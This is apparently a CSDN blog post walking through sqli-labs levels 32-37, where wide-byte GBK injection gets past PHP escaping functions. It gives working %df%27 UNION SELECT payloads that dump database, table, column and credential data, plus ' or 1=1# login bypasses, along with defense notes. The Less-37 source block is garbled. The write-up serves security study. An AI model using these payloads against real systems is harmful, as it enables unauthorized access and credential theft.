Sqli-labs 复习 Less32-37 宽字节注入绕过过滤函数

最新推荐文章于 2022-03-11 16:22:57 发布
最新推荐文章于 2022-03-11 16:22:57 发布
阅读量698 收藏 1
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/81592860
版权

本文记录 SQL 注入的学习过程,资料为 SQLi

SQLi 博客目录

宽字节注入绕过过滤函数

过滤函数

  1. addslashes()

    addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。

    预定义字符是:

     单引号(')
 双引号(")
 反斜杠(\)
 NULL

    提示:该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串。

    注释:默认地,PHP 对所有的 GET、POST 和COOKIE 数据自动运行 addslashes()。所以您不应对已转义过的字符串使用 addslashes(),因为这样会导致双层转义。遇到这种情况时可以使用函数 get_magic_quotes_gpc() 进行检测。

    语法:addslashes(string)

     string 必需。规定要转义的字符串。
 返回值: 返回已转义的字符串。
 PHP 版本: 4+

  2. tripslashes()

    函数删除由 addslashes() 函数添加的反斜杠。

  3. mysql_real_escape_string()

    函数转义SQL 语句中使用的字符串中的特殊字符。

    下列字符受影响:

     \x00
 \n
 \r
 \
 '
 "
 \x1a

    如果成功,则该函数返回被转义的字符串。如果失败,则返回false。

    语法:mysql_real_escape_string(string,connection)

     	string 必需。规定要转义的字符串。
 	connection 可选。规定MySQL 连接。如果未规定,则使用上一个连接。

    说明:本函数将 string 中的特殊字符转义,并考虑到连接的当前字符集,因此可以安全用于mysql_query()。

绕过原理

  1. 原理

    mysql 在使用GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个汉字(前一个ascii 码大于128 才能到汉字的范围)。

    我们在过滤’ 的时候,往往利用的思路是将’ 转换为’ (转换的函数或者思路会在每一关遇到的时候介绍)。

    1. %df 吃掉 \ 具体的原因是 urlencode(’) = %5c%27,我们在 %5c%27 前面添加 %df,形成 %df%5c%27,而上面提到的 mysql 在 GBK 编码方式的时候会将两个字节当做一个汉字,此事 %df%5c 就是一个汉字,%27 则作为一个单独的符号在外面,同时也就达到了我们的目的。

    2. 将 ’ 中的 \ 过滤掉,例如可以构造 %**%5c%5c%27 的情况,后面的 %5c 会被前面的 %5c 给注释掉。这也是bypass 的一种方法。

  2. 注入思路

    urlencode(’) = %5c%27,我们在 %5c%27 前面添加 %df,形成 %df%5c%27,而上面提到的 mysql 在 GBK 编码方式的时候会将两个字节当做一个汉字,此时 %df%5c 就是一个汉字,%27 则作为一个单独的符号在外面,同时也就达到了我们的目的。

Less-32 绕过自定义过滤函数

  1. 注入思路

    urlencode(’) = %5c%27,我们在 %5c%27 前面添加 %df,形成 %df%5c%27,而上面提到的 mysql 在 GBK 编码方式的时候会将两个字节当做一个汉字,此事 %df%5c 就是一个汉字,%27 则作为一个单独的符号在外面,同时也就达到了我们的目的。

  2. 源代码

     function check_addslashes($string)
 {
     $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);          //escape any backslash
     $string = preg_replace('/\'/i', '\\\'', $string);                               //escape single quote with a backslash
     $string = preg_replace('/\"/', "\\\"", $string);                                //escape double quote with a backslash
     return $string;
 }

 mysql_query("SET NAMES gbk");
 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
 $result=mysql_query($sql);
 $row = mysql_fetch_array($result);

  3. 测试

    使用 %df%27 显示

    ?id=-1%df%27union select 1,user(),3–+

    \ 的编码为 %5c,%df 结合 %5c 会形成一个汉字

  4. 猜数据库

    ?id=-1%df%27union select 1,database(),3–+

    结果为 security

  5. 猜表名

    ?id=-1%df%27union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),3–+

    结果为 emails,referers,uagents,users

  6. 猜列名

    ?id=-1%df%27union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=0x7365637572697479 limit 0,1),3–+

    结果为 id,username,password

  7. 猜数据

    ?id=-1%df%27union select 1,(select group_concat(username) from security.users limit 0,1),3–+

    ?id=-1%df%27union select 1,(select group_concat(password) from security.users limit 0,1),3–+

Less-33 绕过 addslashes()函数 - GET

  1. 原理

    addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。
    过滤:

     单引号(')
 双引号(")
 反斜杠(\\)

  2. 源代码

     function check_addslashes($string)
 {
     $string= addslashes($string);
     return $string;
 }
 
 $id=check_addslashes($_GET['id']);
 mysql_query("SET NAMES gbk");
 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
 $result=mysql_query($sql);
 $row = mysql_fetch_array($result);

  3. 测试

    提示:该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串。

    Addslashes()函数和我们在 32 关实现的功能基本一致的,所以我们依旧可以利用 %df 进行绕过。

    Notice:使用 addslashes(),我们需要将 mysql_query 设置为 binary 的方式,才能防御此漏洞。

     Mysql_query("SET character_set_connection=gbk,character_set_result=gbk,character_set_client=binary",$conn);

    使用 %df%27 使 %df 与 %5c 结合然后显示 %27

    ?id=-1%df%27union select 1,user(),3–+

    \ 的编码为 %5c,%df 结合 %5c 会形成一个汉字

  4. 猜数据库

    ?id=-1%df%27union select 1,database(),3–+

    结果为 security

  5. 猜表名

    ?id=-1%df%27union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),3–+

    结果为 emails,referers,uagents,users

  6. 猜列名

    ?id=-1%df%27union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=0x7365637572697479 limit 0,1),3–+

    结果为 id,username,password

  7. 猜数据

    ?id=-1%df%27union select 1,(select group_concat(username) from security.users limit 0,1),3–+

    ?id=-1%df%27union select 1,(select group_concat(password) from security.users limit 0,1),3–+

Less-34 绕过 addslashes() - POST

  1. 原理

    本关是 post 型的注入漏洞,同样的也是将post 过来的内容进行了 ‘\’ 的处理。由上面的例子可以看到我们的方法就是将过滤函数添加的 \ 给吃掉。而 get 型的方式我们是以 url 形式提交的,因此数据会通过URLencode,如何将方法用在 post 型的注入当中,我们此处介绍一个新的方法。

    将 utf-8 转换为 utf-16 或 utf-32,例如将 ’ 转为 utf-16 为 %EF%BF%BD% 。我们就可以利用这个方式进行尝试。

    我们用万能密码的方式的来突破这一关。

  2. 测试

     在 username 输入 %EF%BF%BD%27 or 1=1#
 在 password 输入 任意

  3. 源代码

     $uname = addslashes($uname1);
 $passwd= addslashes($passwd1);

 mysql_query("SET NAMES gbk");
 @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
 $result=mysql_query($sql);
 $row = mysql_fetch_array($result);

    构造后的 sql 语句为

     SELECT username, password FROM users WHERE username='%EF%BF%BD' or 1=1#' and password='$passwd' LIMIT 0,1

    Explain:

    SELECT username, password FROM users WHERE username=’%EF%BF%BD%27 or 1=1 起到作用,后面的则被#注释掉了。而起作用的的语句不论select 选择出来的内容是什么与 1=1 进行 or 操作后,始终是1。

Less-35 绕过 addslashes() 函数 - 整型

  1. 源代码

     function check_addslashes($string)
 {
     $string = addslashes($string);
     return $string;
 }

 $id=check_addslashes($_GET['id']);
 mysql_query("SET NAMES gbk");
 $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
 $result=mysql_query($sql);
 $row = mysql_fetch_array($result);

    35 关和 33 关是大致的一样的,区别就是id 没有被 ’ 符号包括起来,那我们就没有必要去考虑check_addslashes() 函数的意义了

  2. 测试

    ?id=-1 union select 1,user(),3–+

    两个空格绕过过滤

  3. 猜数据库

    ?id=-1 union select 1,database(),3–+

    结果为 security

  4. 猜表名

    ?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),3–+

    结果为 emails,referers,uagents,users

  5. 猜列名

    ?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=0x7365637572697479 limit 0,1),3–+

    结果为 id,username,password

  6. 猜数据

    ?id=-1 union select 1,(select group_concat(username) from security.users limit 0,1),3–+

    ?id=-1 union select 1,(select group_concat(password) from security.users limit 0,1),3–+

Less-36 绕过 mysql_real_eacape_string() 函数 - GET

  1. 源代码

     function check_quotes($string)
 {
 	$string= mysql_real_escape_string($string);
 	return $string;
 }
 
 $id=check_quotes($_GET['id']);
 mysql_query("SET NAMES gbk");
 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
 $result=mysql_query($sql);
 $row = mysql_fetch_array($result);

  2. 原理

    mysql_real_escape_string() 函数

     \x00
 \n
 \r
 \
 '
 "
 \x1a

    如果成功,则该函数返回被转义的字符串。如果失败,则返回false。

    但是因 mysql 我们并没有设置成 gbk,所以 mysql_real_escape_string() 依旧能够被突破。方法和上述是一样的

  3. 测试

    ?id=-1%EF%BF%BD%27union select 1,user(),3–+

    这个我们利用的 ’ 的 utf-16 进行突破的,我们也可以利用 %df 进行。

    ?id=-1%df%27union select 1,user(),3–+

  4. 防御

    在使用 mysql_real_escape_string() 时,如何能够安全的防护这种问题,需要将 mysql 设置为 gbk 即可。

    设置代码:

     Mysql_set_charset('gbk','$conn')

Less-37 绕过 mysql_real_escape_string() 函数 - POST

  1. 原理

    本关与 34 关是大致相似的,区别在于处理 post 内容用的是 mysql_real_escape_string()函数,而不是 addslashes()函数,但是原理是一直的,上面我们已经分析过原理了,这里就不进行赘述了。

    利用万能密码的思路进行突破。

  2. 源代码

    mysql_query(“SET NAMES gbk”);
    @ s q l = " S E L E C T u s e r n a m e , p a s s w o r d F R O M u s e r s W H E R E u s e r n a m e = ′ sql="SELECT username, password FROM users WHERE username=' sql="SELECTusername,passwordFROMusersWHEREusername=uname’ and password=’$passwd’ LIMIT 0,1";
    r e s u l t = m y s q l q u e r y ( result=mysql_query( result=mysqlquery(sql);
    r o w = m y s q l f e t c h a r r a y ( row = mysql_fetch_array( row=mysqlfetcharray(result);

  3. 总结

    可以总结一下过滤 ’ 常用的三种方式是直接 replace(),addslashes(),mysql_real_escape_string()。三种方式仅仅依靠一个函数是不能完全防御的,所以我们在编写代码的时候需要考虑的更加仔细。同时在上述过程中,我们也给出三种防御的方式,相信仔细看完已经明白了,这里就不赘述了。

网络安全打工人
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
url存在字节跨站漏洞_CTF自学笔记(三)跨站脚本攻击[二]
weixin_39929465的博客
12-11 718
点击上方蓝字关注!注:本篇文章为个人学习笔记仅供学习交流。防护与绕过1.特定标签过滤任何一种标签,无论是否合法,都可以构造出xss代码。如下:若输出点位于HTML标签的属性中或JavaScript代码中,进行简单地闭合,属性拼接或JavaScript代码拼接,即可执行xss代码。同时HTML5也带来了部分标签,如:具体xss攻击向量可通过http://html5sec.org/参考学习。...
SQL注入-宽字节注入(十一)(面试热点)
Gjqhs的博客
02-20 847
实验目的 普及宽字节注入的原理和应用场合,以及宽字节注入的基本方法和流程。 实验环境 攻击机:告诉桃花不用开了 (1)操作系统:Windows10 (2)安装的应用软件:sqlmap、Burpsuite、FireFox浏览器插件Hackbar、 FoxyProxy等 (3)登录账号密码:操作系统帐号Admin,密码asdfghjkl 靶机:关键球 (1)操作系统:Centos7(本机亦可) (2)安装的应用软件:Apache、MySQL(MariaDB)、PHP:DVWA、SQLi-Labs、Webug
url存在字节跨站漏洞_漏洞那些事er 反射型跨站脚本攻击
weixin_39640543的博客
12-10 523
跨站脚本攻击(Cross Site Scripting,缩写为XSS)本质上仍是注入攻击的一种。当实施此类攻击时,攻击者通过直接或间接的方式,向WEB应用提交包含恶意代码数据,而WEB应用未对提交数据进行合法性验证或转义处理,最终致使恶意代码在被攻击者的浏览器中执行。 跨站脚本是所有WEB应用安全漏洞中最常见的一种,一些安全公司的统计数据显示,其数量占据了WE...
java 字节_字节XSS跨站攻击
weixin_31953847的博客
02-13 693
简介字节跨站漏洞多发生在GB系统编码。 对于GBK编码,字符是由两个字节构成,在%df遇到%5c时,由于%df的ascii大于128,所以会自动拼接%5c,吃掉反斜线。而%27 %20小于ascii(128)的字符就会保留。通常都会用反斜线来转义恶意字符串,但是如果被吃掉后,转义失败,恶意的xss代码可以继续运行。什么是字节GB2312、GBK、GB18030、BIG5、Shift_JIS等这...
Sqli-labs Less32-37 宽字节注入绕过过滤函数
kevinhanser
08-10 2155
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 32: GET - Bypass custom filter adding slashes to dangerous chasrs 原理 mysql 在使用GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个汉字(前一个ascii 码大于128 才能到汉字的范围)。我们在...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
跨站脚本攻击字符过滤
07-25
用这个办法,可以过滤在输入中含有 % [ ] { } ; & + - " ( ) 的这些字符。
Java包含常见web漏洞测试项目
12-06
一个包含web常见漏洞的maven 项目。JDK8 +springMVC+JDBC+mybatis+mysql。使用Eclipse导入maven项目,用sql创建数据库和表,修改数据库连接密码。即可运行。有兴趣的可以研究测试。
url存在字节跨站漏洞_开发者必读篇之Web漏洞防护指南
weixin_39625468的博客
11-29 443
专注于Java领域优质技术,欢迎关注作者:想要好看的 图灵社区本文配图来自美剧《黑客军团 第3季》。web的发展史早期的互联网非常的单调,一般只有静态页面,现在,随着技术的发展,web上大多数站点实际上是web应用程序,在服务器和浏览器之间进行双向的信息传递。他们支持注册登录,金融交易,搜索及用户创作的内容。用户只需要拥有一个浏览器,就能实现各种功能。Web是指一个网站的前端页面到后端服务,比如我...
Sqli-labs之Less-37
m0_46315342的博客
06-04 350
                                          &nbs...
url存在字节跨站漏洞_【XSS漏洞】XSS漏洞相关总结v1.0
weixin_39738152的博客
12-04 664
点击上方“公众号” 可以订阅哦!Hello,各位小伙伴周五晚上好~终于到了XSS漏洞的完结篇啦~~感觉本公众号写的最多的就是XSS,现在可以告一段落了...让我们来看看第一版XSS漏洞总结吧!Part.0目录目录一、XSS概述什么是XSS?二、XSS的分类XSS的三种类型反射型XSS存储型XSSDOM型XSSDVWA平台通关三、XSS的利用利用XSS盗取用户cookie利用XSS进行网页...
人工智能在安全漏洞方面的应用_常见的Web安全漏洞及测试方法介绍
weixin_39673601的博客
11-21 370
背景介绍Web应用一般是指B/S架构的通过HTTP/HTTPS协议提供服务的统称。随着互联网的发展,Web应用已经融入了我们的日常生活的各个方面。在目前的Web应用中,大多数应用不都是静态的网页浏览,而是涉及到服务器的动态处理。如果开发者的安全意识不强,就会导致Web应用安全问题层出不穷。我们一般说的Web应用攻击,是指攻击者通过浏览器或者其他的攻击工具,在URL或者其他的输入区域(如表单等),向...
addslashes和 get_magic_quotes_gpc过滤SQL字符
webnoties的专栏
12-09 1001
php中的addslashes函数使需要让数据库处理的字符串中引号的部份加上斜线,以供数据库查询 (query) 能顺利运作。这些会被改的字符包括单引号 (')、双引号 (")、反斜线 backslash (\) 以及空字符 NUL (the null byte)。 语法: string addslashes(string str); 1,表单提交中addslashes的表现。 首先要看get_m
宽字节注入(知识点)
qq_39416206的博客
03-11 790
宽字节注入
sqli-labs宽字节注入关卡
最新发布
09-27
sqli-labs宽字节注入关卡是指在sqli-labs闯关中的相关关卡,用于学习和理解宽字节注入漏洞。它是通过将character_set_client设置为binary来解决字节或多字节问题的方法,从而有效避免字符注入。通过使用工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值